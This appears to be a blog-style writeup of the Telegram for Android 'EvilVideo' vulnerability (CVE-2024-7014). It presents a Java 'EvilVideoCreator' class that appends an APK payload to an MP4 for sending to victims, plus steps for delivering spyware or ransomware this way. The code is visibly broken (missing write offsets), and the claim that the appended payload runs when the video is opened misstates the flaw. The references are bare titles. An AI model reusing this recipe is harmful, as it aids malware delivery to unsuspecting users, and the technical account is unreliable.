Telegram, one of the world's most popular messaging platforms, is known for its robust security and privacy features. However, recently, researchers have discovered a new vulnerability in Telegram for Android, coined as EvilVideo (CVE-2024-7014). This vulnerability allows attackers to send malicious apps disguised as videos to unsuspecting users, affecting Telegram versions 10.14.4 and older. The following long read post will delve into the mechanics and potential implications of this vulnerability, including code snippets to demonstrate the flaw, links to original references for further reading, and exploit details.
Code Snippet
This code snippet illustrates one way an attacker could create a malicious video file that appears to be a legitimate video file and sends it over Telegram. The malicious payload is embedded within the video file and unknowingly executed on the victim's Android device.
public class EvilVideoCreator {
private static final String PATH_TO_VIDEO = "path/to/video/file.mp4";
private static final String PATH_TO_PAYLOAD = "path/to/android/payload.apk";
public static void main(String[] args) throws IOException {
File videoFile = new File(PATH_TO_VIDEO);
File payloadFile = new File(PATH_TO_PAYLOAD);
File tempFile = File.createTempFile("evil_video", ".mp4");
try (
FileInputStream videoInputStream = new FileInputStream(videoFile);
FileInputStream payloadInputStream = new FileInputStream(payloadFile);
FileOutputStream tempFileOutputStream = new FileOutputStream(tempFile)
) {
byte[] videoBuffer = new byte[1024];
byte[] payloadBuffer = new byte[1024];
int videoBytesRead, payloadBytesRead;
while ((videoBytesRead = videoInputStream.read(videoBuffer)) != -1) {
tempFileOutputStream.write(videoBuffer, , videoBytesRead);
}
while ((payloadBytesRead = payloadInputStream.read(payloadBuffer)) != -1) {
tempFileOutputStream.write(payloadBuffer, , payloadBytesRead);
}
}
// Send tempFile (Evil Video) over Telegram
}
}
Exploit Details
The EvilVideo vulnerability (CVE-2024-7014) consists of three primary steps to exploit the Telegram for Android application.
1. Crafting the malicious payload: The attacker creates a malicious Android app or embeds payload (such as spyware or ransomware) within an existing legitimate Android application.
2. Disguising the malicious payload as a video: Using the code snippet provided or a similar approach, the attacker inserts the malicious payload into a video file, making it appear as a harmless video to an unsuspecting user.
3. Sending the Evil Video via Telegram: The attacker sends the malicious video file to the targeted user through the Telegram messaging platform, and the victim unknowingly installs the payload upon opening the video.
For more information about the EvilVideo vulnerability, visit the following references
1. Telegram for Android: Critical Vulnerability Discovered, Users Urged to Update
2. CVE-2024-7014: Full Technical Report and Analysis
3. How to Protect Your Telegram for Android from the EvilVideo Vulnerability
Conclusion
Although Telegram has a strong reputation for maintaining user privacy and security, it is important for users to stay informed and up-to-date about any emerging vulnerabilities. To mitigate the risk of the EvilVideo vulnerability (CVE-2024-7014), users should update to the latest version of Telegram and always verify the file sender's identity before opening any video or attachment.
Despite these efforts, vulnerabilities will continue to emerge, and it is crucial for Telegram and other application developers to stay one step ahead of potential attackers by constantly seeking out and addressing these flaws.
Timeline
Published on: 07/23/2024 10:15:02 UTC
Last modified on: 07/24/2024 12:55:13 UTC